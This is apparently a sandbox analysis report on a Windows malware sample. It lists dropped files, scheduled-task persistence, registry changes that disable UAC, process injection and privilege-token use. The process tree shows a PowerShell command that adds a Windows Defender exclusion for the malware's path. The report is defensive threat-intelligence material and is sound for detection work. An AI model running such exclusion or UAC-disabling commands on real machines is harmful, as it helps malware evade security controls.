File created	C:\Program Files (x86)\mWJfrhglotUn\oOlyGTQ.dll	UFfWEUA.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\CLlJrdH.xml	MFzQQXm.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\GeNwIyt.dll	UFfWEUA.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\iNuSjUK.xml	UFfWEUA.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	MFzQQXm.exe
File created	C:\Program Files (x86)\ADJLsahCU\cDkNDc.dll	UFfWEUA.exe
File created	C:\Program Files (x86)\mWJfrhglotUn\GMDyzBJ.dll	MFzQQXm.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\VTfApMu.xml	UFfWEUA.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	MFzQQXm.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\jHLhxMn.dll	MFzQQXm.exe
File created	C:\Program Files (x86)\ADJLsahCU\dsevDyu.xml	UFfWEUA.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\zcWDDkYNaDicY.dll	UFfWEUA.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\QyPrdDx.dll	UFfWEUA.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\JCqKiHa.xml	MFzQQXm.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	MFzQQXm.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	MFzQQXm.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	UFfWEUA.exe
File created	C:\Program Files (x86)\ADJLsahCU\gVPPwdC.xml	MFzQQXm.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\pqWksAXTqVMYf.dll	MFzQQXm.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\fmjOOsG.xml	UFfWEUA.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\FPieTEPPuEmJrhC.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File opened for modification	C:\Windows\rss	7sdvdV1KeQFYxIWsBQgNwiWC.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\rss	ZQnEIniDJr491m3kOJDD4KtD.exe
File created	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\rss\csrss.exe	7sdvdV1KeQFYxIWsBQgNwiWC.exe
File opened for modification	C:\Windows\Tasks\FPieTEPPuEmJrhC.job	schtasks.exe
File created	C:\Windows\Tasks\rrqYunoktxOQmCoCX.job	schtasks.exe
File created	C:\Windows\rss\csrss.exe	CDb5tzv095RAKNfASZDFNrbA.exe
File opened for modification	C:\Windows\rss	Np7nxhZprpTK4hagH7g20Bek.exe
File created	C:\Windows\rss\csrss.exe	Np7nxhZprpTK4hagH7g20Bek.exe
File created	C:\Windows\Tasks\XyyyteIMwZeutaZuw.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\XyyyteIMwZeutaZuw.job	schtasks.exe
File created	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File created	C:\Windows\rss\csrss.exe	ZQnEIniDJr491m3kOJDD4KtD.exe
File opened for modification	C:\Windows\rss	CDb5tzv095RAKNfASZDFNrbA.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5980	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1uc.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1uc.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1uc.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u1uc.0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u1uc.0.exe

Creates scheduled task(s) 1 TTPs 20 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
436	schtasks.exe
5416	schtasks.exe
4576	schtasks.exe
4564	schtasks.exe
2064	schtasks.exe
2072	schtasks.exe
3932	schtasks.exe
5072	schtasks.exe
2060	schtasks.exe
5972	schtasks.exe
4648	schtasks.exe
5356	schtasks.exe
5960	schtasks.exe
5388	schtasks.exe
1836	schtasks.exe
404	schtasks.exe
208	schtasks.exe
6100	schtasks.exe
2988	schtasks.exe
5048	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe

GoLang User-Agent 3 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	155	Go-http-client/1.1
HTTP User-Agent header	156	Go-http-client/1.1
HTTP User-Agent header	159	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	7sdvdV1KeQFYxIWsBQgNwiWC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	7sdvdV1KeQFYxIWsBQgNwiWC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	7sdvdV1KeQFYxIWsBQgNwiWC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2161 = "Altai Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2001 = "Cabo Verde Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	7sdvdV1KeQFYxIWsBQgNwiWC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	7sdvdV1KeQFYxIWsBQgNwiWC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	7sdvdV1KeQFYxIWsBQgNwiWC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	MFzQQXm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2142 = "Transbaikal Standard Time"	windefender.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	Np7nxhZprpTK4hagH7g20Bek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	7sdvdV1KeQFYxIWsBQgNwiWC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	ZQnEIniDJr491m3kOJDD4KtD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
684	powershell.exe
684	powershell.exe
684	powershell.exe
4964	powershell.exe
4964	powershell.exe
4964	powershell.exe
2436	powershell.exe
2436	powershell.exe
5108	powershell.exe
5108	powershell.exe
2436	powershell.exe
5108	powershell.exe
4964	powershell.exe
2436	powershell.exe
3392	powershell.exe
3392	powershell.exe
5108	powershell.exe
3392	powershell.exe
3836	u1uc.0.exe
3836	u1uc.0.exe
3392	powershell.exe
3392	powershell.exe
5632	powershell.exe
5632	powershell.exe
5632	powershell.exe
5632	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
4132	Np7nxhZprpTK4hagH7g20Bek.exe
4132	Np7nxhZprpTK4hagH7g20Bek.exe
4168	CDb5tzv095RAKNfASZDFNrbA.exe
4168	CDb5tzv095RAKNfASZDFNrbA.exe
1836	7sdvdV1KeQFYxIWsBQgNwiWC.exe
1836	7sdvdV1KeQFYxIWsBQgNwiWC.exe
4872	ZQnEIniDJr491m3kOJDD4KtD.exe
4872	ZQnEIniDJr491m3kOJDD4KtD.exe
5300	powershell.exe
5300	powershell.exe
5300	powershell.exe
1724	powershell.exe
1724	powershell.exe
5220	powershell.exe
5220	powershell.exe
3080	powershell.exe
3080	powershell.exe
5300	powershell.exe
3080	powershell.exe
1724	powershell.exe
5220	powershell.exe
1724	powershell.exe
3080	powershell.exe
5220	powershell.exe
5220	powershell.exe
3836	u1uc.0.exe
3836	u1uc.0.exe
5812	7sdvdV1KeQFYxIWsBQgNwiWC.exe
5812	7sdvdV1KeQFYxIWsBQgNwiWC.exe
5812	7sdvdV1KeQFYxIWsBQgNwiWC.exe
5812	7sdvdV1KeQFYxIWsBQgNwiWC.exe
5812	7sdvdV1KeQFYxIWsBQgNwiWC.exe
5812	7sdvdV1KeQFYxIWsBQgNwiWC.exe
5812	7sdvdV1KeQFYxIWsBQgNwiWC.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe
Token: SeDebugPrivilege	684	powershell.exe
Token: SeIncreaseQuotaPrivilege	684	powershell.exe
Token: SeSecurityPrivilege	684	powershell.exe
Token: SeTakeOwnershipPrivilege	684	powershell.exe
Token: SeLoadDriverPrivilege	684	powershell.exe
Token: SeSystemProfilePrivilege	684	powershell.exe
Token: SeSystemtimePrivilege	684	powershell.exe
Token: SeProfSingleProcessPrivilege	684	powershell.exe
Token: SeIncBasePriorityPrivilege	684	powershell.exe
Token: SeCreatePagefilePrivilege	684	powershell.exe
Token: SeBackupPrivilege	684	powershell.exe
Token: SeRestorePrivilege	684	powershell.exe
Token: SeShutdownPrivilege	684	powershell.exe
Token: SeDebugPrivilege	684	powershell.exe
Token: SeSystemEnvironmentPrivilege	684	powershell.exe
Token: SeRemoteShutdownPrivilege	684	powershell.exe
Token: SeUndockPrivilege	684	powershell.exe
Token: SeManageVolumePrivilege	684	powershell.exe
Token: 33	684	powershell.exe
Token: 34	684	powershell.exe
Token: 35	684	powershell.exe
Token: 36	684	powershell.exe
Token: SeDebugPrivilege	3916	regasm.exe
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeDebugPrivilege	2436	powershell.exe
Token: SeDebugPrivilege	5108	powershell.exe
Token: SeDebugPrivilege	3392	powershell.exe
Token: SeDebugPrivilege	5632	powershell.exe
Token: SeDebugPrivilege	1152	powershell.exe
Token: SeIncreaseQuotaPrivilege	5684	WMIC.exe
Token: SeSecurityPrivilege	5684	WMIC.exe
Token: SeTakeOwnershipPrivilege	5684	WMIC.exe
Token: SeLoadDriverPrivilege	5684	WMIC.exe
Token: SeSystemProfilePrivilege	5684	WMIC.exe
Token: SeSystemtimePrivilege	5684	WMIC.exe
Token: SeProfSingleProcessPrivilege	5684	WMIC.exe
Token: SeIncBasePriorityPrivilege	5684	WMIC.exe
Token: SeCreatePagefilePrivilege	5684	WMIC.exe
Token: SeBackupPrivilege	5684	WMIC.exe
Token: SeRestorePrivilege	5684	WMIC.exe
Token: SeShutdownPrivilege	5684	WMIC.exe
Token: SeDebugPrivilege	5684	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5684	WMIC.exe
Token: SeRemoteShutdownPrivilege	5684	WMIC.exe
Token: SeUndockPrivilege	5684	WMIC.exe
Token: SeManageVolumePrivilege	5684	WMIC.exe
Token: 33	5684	WMIC.exe
Token: 34	5684	WMIC.exe
Token: 35	5684	WMIC.exe
Token: 36	5684	WMIC.exe
Token: SeDebugPrivilege	4132	Np7nxhZprpTK4hagH7g20Bek.exe
Token: SeImpersonatePrivilege	4132	Np7nxhZprpTK4hagH7g20Bek.exe
Token: SeDebugPrivilege	4168	CDb5tzv095RAKNfASZDFNrbA.exe
Token: SeDebugPrivilege	1836	7sdvdV1KeQFYxIWsBQgNwiWC.exe
Token: SeImpersonatePrivilege	4168	CDb5tzv095RAKNfASZDFNrbA.exe
Token: SeImpersonatePrivilege	1836	7sdvdV1KeQFYxIWsBQgNwiWC.exe
Token: SeIncreaseQuotaPrivilege	5684	WMIC.exe
Token: SeSecurityPrivilege	5684	WMIC.exe
Token: SeTakeOwnershipPrivilege	5684	WMIC.exe
Token: SeLoadDriverPrivilege	5684	WMIC.exe
Token: SeSystemProfilePrivilege	5684	WMIC.exe
Token: SeSystemtimePrivilege	5684	WMIC.exe
Token: SeProfSingleProcessPrivilege	5684	WMIC.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
5552	u1uc.1.exe
5552	u1uc.1.exe
5552	u1uc.1.exe
5552	u1uc.1.exe
5552	u1uc.1.exe
5552	u1uc.1.exe
5552	u1uc.1.exe

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
5552	u1uc.1.exe
5552	u1uc.1.exe
5552	u1uc.1.exe
5552	u1uc.1.exe
5552	u1uc.1.exe
5552	u1uc.1.exe
5552	u1uc.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4184 wrote to memory of 684	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	72
PID 4184 wrote to memory of 684	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	72
PID 4184 wrote to memory of 4736	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	74
PID 4184 wrote to memory of 4736	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	74
PID 4184 wrote to memory of 4736	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	74
PID 4184 wrote to memory of 4704	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	75
PID 4184 wrote to memory of 4704	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	75
PID 4184 wrote to memory of 4704	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	75
PID 4184 wrote to memory of 3916	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	77
PID 4184 wrote to memory of 3916	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	77
PID 4184 wrote to memory of 3916	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	77
PID 4184 wrote to memory of 3916	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	77
PID 4184 wrote to memory of 3916	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	77
PID 4184 wrote to memory of 3916	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	77
PID 4184 wrote to memory of 3916	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	77
PID 4184 wrote to memory of 3916	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	77
PID 4184 wrote to memory of 2796	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	78
PID 4184 wrote to memory of 2796	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	78
PID 4184 wrote to memory of 2796	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	78
PID 3916 wrote to memory of 2388	3916	regasm.exe	81
PID 3916 wrote to memory of 2388	3916	regasm.exe	81
PID 3916 wrote to memory of 2388	3916	regasm.exe	81
PID 3916 wrote to memory of 4132	3916	regasm.exe	169
PID 3916 wrote to memory of 4132	3916	regasm.exe	169
PID 3916 wrote to memory of 4132	3916	regasm.exe	169
PID 3916 wrote to memory of 4168	3916	regasm.exe	83
PID 3916 wrote to memory of 4168	3916	regasm.exe	83
PID 3916 wrote to memory of 4168	3916	regasm.exe	83
PID 3916 wrote to memory of 1836	3916	regasm.exe	422
PID 3916 wrote to memory of 1836	3916	regasm.exe	422
PID 3916 wrote to memory of 1836	3916	regasm.exe	422
PID 3916 wrote to memory of 4872	3916	regasm.exe	86
PID 3916 wrote to memory of 4872	3916	regasm.exe	86
PID 3916 wrote to memory of 4872	3916	regasm.exe	86
PID 4132 wrote to memory of 4964	4132	Np7nxhZprpTK4hagH7g20Bek.exe	419
PID 4132 wrote to memory of 4964	4132	Np7nxhZprpTK4hagH7g20Bek.exe	419
PID 4132 wrote to memory of 4964	4132	Np7nxhZprpTK4hagH7g20Bek.exe	419
PID 4168 wrote to memory of 2436	4168	CDb5tzv095RAKNfASZDFNrbA.exe	190
PID 4168 wrote to memory of 2436	4168	CDb5tzv095RAKNfASZDFNrbA.exe	190
PID 4168 wrote to memory of 2436	4168	CDb5tzv095RAKNfASZDFNrbA.exe	190
PID 1836 wrote to memory of 5108	1836	7sdvdV1KeQFYxIWsBQgNwiWC.exe	91
PID 1836 wrote to memory of 5108	1836	7sdvdV1KeQFYxIWsBQgNwiWC.exe	91
PID 1836 wrote to memory of 5108	1836	7sdvdV1KeQFYxIWsBQgNwiWC.exe	91
PID 4872 wrote to memory of 3392	4872	ZQnEIniDJr491m3kOJDD4KtD.exe	93
PID 4872 wrote to memory of 3392	4872	ZQnEIniDJr491m3kOJDD4KtD.exe	93
PID 4872 wrote to memory of 3392	4872	ZQnEIniDJr491m3kOJDD4KtD.exe	93
PID 3916 wrote to memory of 1032	3916	regasm.exe	95
PID 3916 wrote to memory of 1032	3916	regasm.exe	95
PID 3916 wrote to memory of 1032	3916	regasm.exe	95
PID 3916 wrote to memory of 868	3916	regasm.exe	96
PID 3916 wrote to memory of 868	3916	regasm.exe	96
PID 2388 wrote to memory of 3836	2388	kKWXFd15rddOaRQr2Nfqo1Kf.exe	97
PID 2388 wrote to memory of 3836	2388	kKWXFd15rddOaRQr2Nfqo1Kf.exe	97
PID 2388 wrote to memory of 3836	2388	kKWXFd15rddOaRQr2Nfqo1Kf.exe	97
PID 1032 wrote to memory of 4836	1032	3ULOn4cfburOeIlM0qC3zmfc.exe	99
PID 1032 wrote to memory of 4836	1032	3ULOn4cfburOeIlM0qC3zmfc.exe	99
PID 1032 wrote to memory of 4836	1032	3ULOn4cfburOeIlM0qC3zmfc.exe	99
PID 4836 wrote to memory of 3416	4836	Install.exe	217
PID 4836 wrote to memory of 3416	4836	Install.exe	217
PID 4836 wrote to memory of 3416	4836	Install.exe	217
PID 3416 wrote to memory of 3676	3416	cmd.exe	104
PID 3416 wrote to memory of 3676	3416	cmd.exe	104
PID 3416 wrote to memory of 3676	3416	cmd.exe	104
PID 3676 wrote to memory of 4748	3676	forfiles.exe	105

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe
"C:\Users\Admin\AppData\Local\Temp\93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:684
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
  2⤵
  PID:4736
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2⤵
  PID:4704
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
  2⤵
  - Drops startup file
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3916
- - C:\Users\Admin\Pictures\kKWXFd15rddOaRQr2Nfqo1Kf.exe
    "C:\Users\Admin\Pictures\kKWXFd15rddOaRQr2Nfqo1Kf.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2388
  - - C:\Users\Admin\AppData\Local\Temp\u1uc.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u1uc.0.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:3836
  - - C:\Users\Admin\AppData\Local\Temp\u1uc.1.exe
